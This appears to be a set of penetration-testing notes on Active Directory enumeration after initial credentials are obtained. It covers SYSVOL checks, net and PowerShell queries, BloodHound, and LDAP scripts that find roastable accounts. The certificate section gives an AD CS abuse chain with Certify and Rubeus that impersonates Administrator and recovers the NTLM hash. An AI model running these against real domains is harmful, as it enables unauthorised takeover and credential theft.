# Active Directory enumeration after initial credentials are gained

## SYSVOL

* On Windows, use `runas` with `/netonly` to start a shell that authenticates over the network as the domain user. The local token is unchanged, so this does not give local administrative rights; it only makes outgoing SMB, LDAP and Kerberos requests use the supplied credentials. `runas /netonly` does not verify the password at launch, the first network access is the real check

```sh
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
```

* Check the validity of the credentials against `SYSVOL`, the share on every domain controller that stores the __Group Policy Objects (GPO)__. Every authenticated AD account has read access, so a successful listing proves the credentials work without touching anything else
* Point DNS at the domain, for example at the DC, so that the domain name and the DC's SPNs resolve (PowerShell, elevated; fill in the DC IP and the adapter name)

```powershell
$dnsip = ""
$index = Get-NetAdapter -Name '' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```

* Afterwards, check `SYSVOL` via the `hostname`, which makes the client request a service ticket for `cifs/%HOSTNAME%`, i.e. Kerberos authentication (verify with `klist`)

```sh
dir \\%HOSTNAME%\SYSVOL\
```

* Check `SYSVOL` via the `IP` address to force `NTLM` authentication: no SPN can be built from an IP address, so Kerberos is not attempted. Both listings succeeding means the credentials are valid and the DC accepts both protocols

## Microsoft Management Console (MMC)

* Use the AD snap-ins of the `Remote Server Administration Tools` (RSAT)
* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Services Tools` -> Install
* `Win` + `r` -> `mmc` -> File -> Add/Remove Snap-in -> add the three Active Directory snap-ins (`Active Directory Domains and Trusts`, `Active Directory Sites and Services`, `Active Directory Users and Computers`) -> right click `Active Directory Sites and Services` -> `Change Forest` -> enter the root domain -> right click `Active Directory Users and Computers` -> `Change Domain` -> enter the root domain -> right click `Active Directory Users and Computers` -> View -> Advanced Features
* Start enumerating with a click on the domain object in the tree on the left
* Take a look at the `People` OU (or whichever OUs hold the user objects) -> right click an object to see its properties, including the attribute editor enabled by `Advanced Features`
* Given sufficient rights, users and groups can be changed or created from the same console

## CMD enumeration

Execute from a domain joined machine

* Users

```sh
net user /domain
```

* Specific user

```sh
net user %USERNAME% /domain
```

* Groups

```sh
net group /domain
```

* Specific group (quote names that contain spaces)

```sh
net group "%GROUPNAME%" /domain
```

* Password policy (minimum length, lockout threshold, maximum age) via accounts

```sh
net accounts /domain
```

## PowerShell Cmdlets

Requires the `ActiveDirectory` module that ships with RSAT; `-Server` selects the DC that is queried

* User details via

```powershell
Get-ADUser -Identity $USERNAME -Server exampleDC.com -Properties *
```

* Groups

```powershell
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
```

* Group membership (add `-Recursive` to expand nested groups)

```powershell
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
```

* Generic AD objects, including deleted ones, and objects with failed logons. `badPwdCount` is not replicated between DCs, so query each DC to get a complete picture

```powershell
Get-ADObject -Filter * -IncludeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
```

* Domains

```powershell
Get-ADDomain -Server exampleDC.com
```

## SharpHound and BloodHound

* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)
* Change to the AD user via `runas.exe` and collect with one of the following collectors
  * SharpHound.ps1
  * SharpHound.exe
  * AzureHound.ps1
* For example, collect everything while skipping the domain controllers themselves

```sh
SharpHound.exe --CollectionMethods All --Domain example.com --ExcludeDCs
```

* After some time, collect the current sessions again, since logon sessions change during the day

```sh
SharpHound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
```

* Start the neo4j database (`console` keeps it in the foreground)

```sh
neo4j console
```

* Start BloodHound

```sh
bloodhound --no-sandbox
```

* Drag and drop the zip file produced by SharpHound into the BloodHound window
* Either search for AD objects and use `Analysis` to find an attack path, reading the edge information for the abuse steps
* The `Analysis` tab also lists exploitable accounts directly, for example Kerberoastable accounts (users with an SPN)

## LDAP

## PowerView

Registered machines in the domain (`Get-NetComputer` is `Get-DomainComputer` in current PowerView)

```powershell
Get-NetComputer | select "name"
```

When the computers were added to the domain and by whom: the owner of a computer object is the account that joined the machine, so a non-admin owner is worth a look. This one needs the `ActiveDirectory` module and its `ad:` drive rather than PowerView

```powershell
Get-ADComputer -Filter * -Properties whenCreated | Select-Object Name,@{n="Owner";e={(Get-Acl "ad:\$($_.DistinguishedName)").Owner}},whenCreated
```

## WMI

## Find Certificates and Private Keys

Active Directory Certificate Services (AD CS) CAs and templates can be enumerated with [the Certify tool](https://github.com/GhostPack/Certify.git).

* Enumerate templates the current user can abuse via Certify. The `FullName` printed for the CA in the first step (`dnshostname\CA-name`) is the `/ca:` value of the second step. Requesting with `/altname:Administrator` only works when the template lets the enrollee supply the subject alternative name and allows client authentication, which is what `/vulnerable` looks for

```sh
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
```

* Copy the returned certificate and private key into `cert.pem` and convert them to a PFX as shown in the last line of the output, for example

```sh
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

* Request a TGT for the impersonated user with the PFX via Rubeus (PKINIT); `/getcredentials` additionally recovers the account's NTLM hash through a U2U request

```sh
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
```
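The SYSVOL credential check from the first section as one script. This is an added example, not code from the original notes: it is meant to be run inside the `cmd.exe` or `powershell.exe` started with `runas /netonly` (from an elevated shell, since changing the DNS client settings needs local admin), sets DNS to the DC, lists the GPO directories via hostname and via IP, and uses `klist` to confirm that the hostname path really used Kerberos rather than falling back to NTLM. The DC name, DC IP, domain and adapter name are assumptions to be replaced.

```powershell
# Added example (not from the original notes). Run inside the shell started with
# `runas /netonly`, so every network access below authenticates as the supplied domain user.
# DcHost, DcIp, Domain and Adapter are assumed values; replace them with the target's.
param(
    [string]$DcHost  = 'dc01.example.com',   # FQDN, so the client can build the SPN cifs/dc01.example.com
    [string]$DcIp    = '10.10.10.5',
    [string]$Domain  = 'example.com',
    [string]$Adapter = 'Ethernet'
)

# 1. Point the host at the DC for DNS; without this neither the FQDN nor the SPN resolves.
$ifIndex = (Get-NetAdapter -Name $Adapter).ifIndex
Set-DnsClientServerAddress -InterfaceIndex $ifIndex -ServerAddresses $DcIp

function Test-SysvolAccess {
    param([string]$Target, [string]$Domain)
    # SYSVOL\<domain>\Policies holds one directory per GPO, readable by every authenticated account,
    # so a successful listing is proof that the credentials are valid.
    $path = "\\$Target\SYSVOL\$Domain\Policies"
    try {
        $gpos = Get-ChildItem -Path $path -Directory -ErrorAction Stop
        [pscustomobject]@{ Target = $Target; Valid = $true;  GpoCount = $gpos.Count; Error = $null }
    } catch {
        # Typical failures: 'The user name or password is incorrect' (bad credentials),
        # 'Access is denied' (disabled or locked account), or a name-resolution error (DNS not set).
        [pscustomobject]@{ Target = $Target; Valid = $false; GpoCount = 0;           Error = $_.Exception.Message }
    }
}

# 2. Hostname first: the SMB client requests a ticket for cifs/<host>, i.e. Kerberos.
Test-SysvolAccess -Target $DcHost -Domain $Domain

# The /netonly shell has its own logon session and ticket cache; a cached cifs/ ticket
# for the DC proves Kerberos was used and did not silently fall back to NTLM.
$ticket = klist 2>$null | Select-String -Pattern "cifs/$DcHost"
if ($ticket) { "Kerberos service ticket cached for cifs/$DcHost" }
else         { "No cifs/ ticket cached: the listing most likely used NTLM" }

# 3. IP address: no SPN can be derived from an IP, so the client authenticates with NTLM.
Test-SysvolAccess -Target $DcIp -Domain $Domain
```

A `Valid = $true` result for the hostname with no cached ticket usually means the clock skew or DNS setup broke Kerberos and the DC accepted NTLM instead; that is worth knowing before relying on Kerberos-only tooling later.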
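Worked example for the CMD, PowerShell cmdlet, LDAP and PowerView sections above: the same questions (users of interest, password policy, privileged group membership, computers and their owners) asked directly over LDAP with .NET's `DirectorySearcher`. This is an added example, not code from the original notes or from PowerView; it needs no RSAT, runs on a non-domain-joined host, and inside a `runas /netonly` shell the LDAP bind uses the supplied domain credentials. The DC name and base DN are assumptions.

```powershell
# Added example (not from the original notes). Raw LDAP enumeration with DirectorySearcher.
# DcHost and BaseDn are assumed values; replace them with the target's.
$DcHost = 'dc01.example.com'
$BaseDn = 'DC=example,DC=com'

function Search-Ldap {
    param([string]$Filter, [string[]]$Properties, [string]$Base = $BaseDn, [string]$Scope = 'Subtree')
    $root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DcHost/$Base")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter      = $Filter
    $searcher.SearchScope = $Scope
    $searcher.PageSize    = 500            # server-side paging: get past the 1000-entry result limit
    foreach ($p in $Properties) { [void]$searcher.PropertiesToLoad.Add($p) }
    foreach ($r in $searcher.FindAll()) {
        $o = [ordered]@{}
        foreach ($p in $Properties) {
            $v = $r.Properties[$p]     # ResultPropertyValueCollection, empty when the attribute is unset
            $o[$p] = if ($v.Count -eq 0) { $null } elseif ($v.Count -eq 1) { $v[0] } else { @($v) -join ';' }
        }
        [pscustomobject]$o
    }
}

# userAccountControl bits; ':1.2.840.113556.1.4.803:=' is the bitwise-AND matching rule
$UAC_ACCOUNTDISABLE   = 2
$UAC_DONT_REQ_PREAUTH = 4194304
$User = '(objectCategory=person)(objectClass=user)'

# Kerberoastable: enabled users carrying an SPN (what BloodHound's Analysis tab lists)
Search-Ldap "(&$User(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=$UAC_ACCOUNTDISABLE)))" `
            'samaccountname','serviceprincipalname'

# AS-REP roastable: Kerberos pre-authentication disabled
Search-Ldap "(&$User(userAccountControl:1.2.840.113556.1.4.803:=$UAC_DONT_REQ_PREAUTH))" 'samaccountname'

# Effective members of Domain Admins, nested groups included (':1.2.840.113556.1.4.1941:' = IN_CHAIN)
$da = "CN=Domain Admins,CN=Users,$BaseDn"
Search-Ldap "(&$User(memberOf:1.2.840.113556.1.4.1941:=$da))" 'samaccountname','distinguishedname'

# Accounts that are, or once were, protected by AdminSDHolder: a second view of privilege
Search-Ldap "(&$User(adminCount=1))" 'samaccountname'

# Password policy lives on the domain head (the LDAP side of `net accounts /domain`)
$pol = Search-Ldap '(objectClass=domain)' 'minpwdlength','lockoutthreshold','pwdhistorylength','maxpwdage' -Scope Base
$maxAge = if ($pol.maxpwdage -eq [long]::MinValue) { 'never' } else { [TimeSpan]::FromTicks(-$pol.maxpwdage).Days }
[pscustomobject]@{
    MinPwdLength = $pol.minpwdlength; LockoutThreshold = $pol.lockoutthreshold
    HistoryLength = $pol.pwdhistorylength; MaxPwdAgeDays = $maxAge
}

# Computers with creation time and owner; the owner is the account that joined the machine,
# so a plain user as owner points at a self-joined host (the PowerView section's question)
Search-Ldap '(objectCategory=computer)' 'name','operatingsystem','whencreated','distinguishedname' | ForEach-Object {
    $entry    = [adsi]"LDAP://$DcHost/$($_.distinguishedname)"
    $ownerSid = $entry.ObjectSecurity.GetOwner([System.Security.Principal.SecurityIdentifier])
    # SID-to-name translation needs a trust path; fall back to the raw SID on a non-joined host
    try   { $owner = $ownerSid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $owner = $ownerSid.Value }
    [pscustomobject]@{ Name = $_.name; OS = $_.operatingsystem; Created = $_.whencreated; Owner = $owner }
}
```

Unlike `net user /domain`, which only works from a domain-joined machine, these searches work anywhere the DC's LDAP port is reachable, which is why they are the usual fallback when RSAT cannot be installed.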
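Worked example for the certificate section: the template-side conditions that `Certify find /vulnerable` checks for the `/altname` request to succeed (enrollee supplies the subject, no manager approval, no authorized signatures, an authentication EKU, enrollment rights for a low-privilege principal, and the template published on an enterprise CA), reproduced over LDAP so the finding can be cross-checked before a request is made. This is an added example, not Certify's code: it covers only the template attributes and ACL, not the CA's own enrollment ACL that Certify also inspects. The DC name is an assumption.

```powershell
# Added example (not Certify's code). Flags templates that meet the template-side conditions
# for an enrollee-supplied SAN request, and prints the matching Certify request line.
# DcHost is an assumed value; replace it with the target DC.
$DcHost = 'dc01.example.com'

$rootDse  = [adsi]"LDAP://$DcHost/RootDSE"
$configNc = $rootDse.Properties['configurationNamingContext'].Value
$pkiBase  = "CN=Public Key Services,CN=Services,$configNc"

# Template flag bits and EKU OIDs as defined for AD CS templates
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1      # msPKI-Certificate-Name-Flag: requester sets subject/SAN
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2      # msPKI-Enrollment-Flag: manager approval required
$AuthEkus = '1.3.6.1.5.5.7.3.2',      # Client Authentication
            '1.3.6.1.5.2.3.4',        # PKINIT Client Authentication
            '1.3.6.1.4.1.311.20.2.2', # Smart Card Logon
            '2.5.29.37.0'             # Any Purpose
$EnrollRightGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$LowPrivSids = 'S-1-1-0', 'S-1-5-11'   # Everyone, Authenticated Users
$LowPrivRids = 513, 515                # Domain Users, Domain Computers

# 1. Enterprise CAs and the templates each publishes; Certify's FullName is dnshostname\CA-name
$cas = foreach ($ca in ([adsi]"LDAP://$DcHost/CN=Enrollment Services,$pkiBase").Children) {
    [pscustomobject]@{
        FullName  = "$($ca.Properties['dNSHostName'].Value)\$($ca.Properties['cn'].Value)"
        Templates = @($ca.Properties['certificateTemplates'])
    }
}

# 2. Does the template ACL grant Enroll (or everything) to a principal every domain account is in?
function Get-LowPrivEnroller([System.DirectoryServices.DirectoryEntry]$Template) {
    $rules = $Template.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($r in $rules) {
        if ($r.AccessControlType -ne 'Allow') { continue }
        $sid = $r.IdentityReference.Value
        $low = ($LowPrivSids -contains $sid) -or ($LowPrivRids -contains [int]$sid.Split('-')[-1])
        if (-not $low) { continue }
        $rights = $r.ActiveDirectoryRights
        $enroll = $rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -or
                  ($rights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
                   ($r.ObjectType -eq $EnrollRightGuid -or $r.ObjectType -eq [guid]::Empty))
        if ($enroll) { return $sid }
    }
    return $null
}

# 3. Apply the conditions to every template in the configuration partition
foreach ($t in ([adsi]"LDAP://$DcHost/CN=Certificate Templates,$pkiBase").Children) {
    $name       = $t.Properties['cn'].Value
    $nameFlag   = [int]$t.Properties['msPKI-Certificate-Name-Flag'].Value
    $enrollFlag = [int]$t.Properties['msPKI-Enrollment-Flag'].Value
    $raSigs     = [int]$t.Properties['msPKI-RA-Signature'].Value     # unset -> 0
    $ekus       = @($t.Properties['pKIExtendedKeyUsage'])            # empty EKU list = any purpose
    $published  = @($cas | Where-Object { $_.Templates -contains $name } | ForEach-Object FullName)
    $enroller   = Get-LowPrivEnroller $t

    $vulnerable = (($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0) -and
                  (($enrollFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0) -and
                  ($raSigs -eq 0) -and
                  ($ekus.Count -eq 0 -or ($ekus | Where-Object { $AuthEkus -contains $_ })) -and
                  $enroller -and ($published.Count -gt 0)
    if ($vulnerable) {
        [pscustomobject]@{
            Template     = $name
            PublishedOn  = ($published -join ';')
            EnrollableBy = $enroller
            EKUs         = ($ekus -join ';')
            Request      = "Certify.exe request /ca:$($published[0]) /template:$name /altname:Administrator"
        }
    }
}
```

A template that shows up here but is rejected by the CA at request time usually fails on the CA-level enrollment ACL or on a CA policy module, which is exactly the part this check leaves to Certify.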